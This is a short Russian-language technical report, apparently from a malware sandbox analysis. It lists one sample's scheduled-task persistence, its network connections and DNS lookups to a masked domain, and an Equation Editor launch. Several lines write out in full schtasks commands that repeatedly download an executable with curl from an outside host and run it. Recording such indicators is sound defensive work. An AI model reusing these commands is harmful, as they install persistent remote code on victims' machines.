Техническая информация
- <SYSTEM32>\tasks\windows\glmxact\glmfac
- <SYSTEM32>\tasks\windows\glmxact\glm
- '%WINDIR%\syswow64\schtasks.exe' /create /sc MINUTE /mo 20 /TN \Windows\Glmxact\GlmFac /TR "%AppData%\glmx32.exe" /f
- '%WINDIR%\syswow64\schtasks.exe' /create /sc MINUTE /mo 15 /TN \Windows\Glmxact\Glm /TR "cmd /c start /min curl --output %AppData%\glmx32.exe -O ""https://nymedsvcsystems.com/nt.php/?dt=%computername%-NT-2&ct=NT"""
- 'ny####vcsystems.com':80
- 'ny####vcsystems.com':443
- http://ny####vcsystems.com/ntt/se
- 'ny####vcsystems.com':443
- DNS ASK ny####vcsystems.com
- '%WINDIR%\syswow64\schtasks.exe' /create /sc MINUTE /mo 20 /TN \Windows\Glmxact\GlmFac /TR "%AppData%\glmx32.exe" /f' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /create /sc MINUTE /mo 15 /TN \Windows\Glmxact\Glm /TR "cmd /c start /min curl --output %AppData%\glmx32.exe -O ""https://nymedsvcsystems.com/nt.php/?dt=%computername%-NT-2&ct=NT"""' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding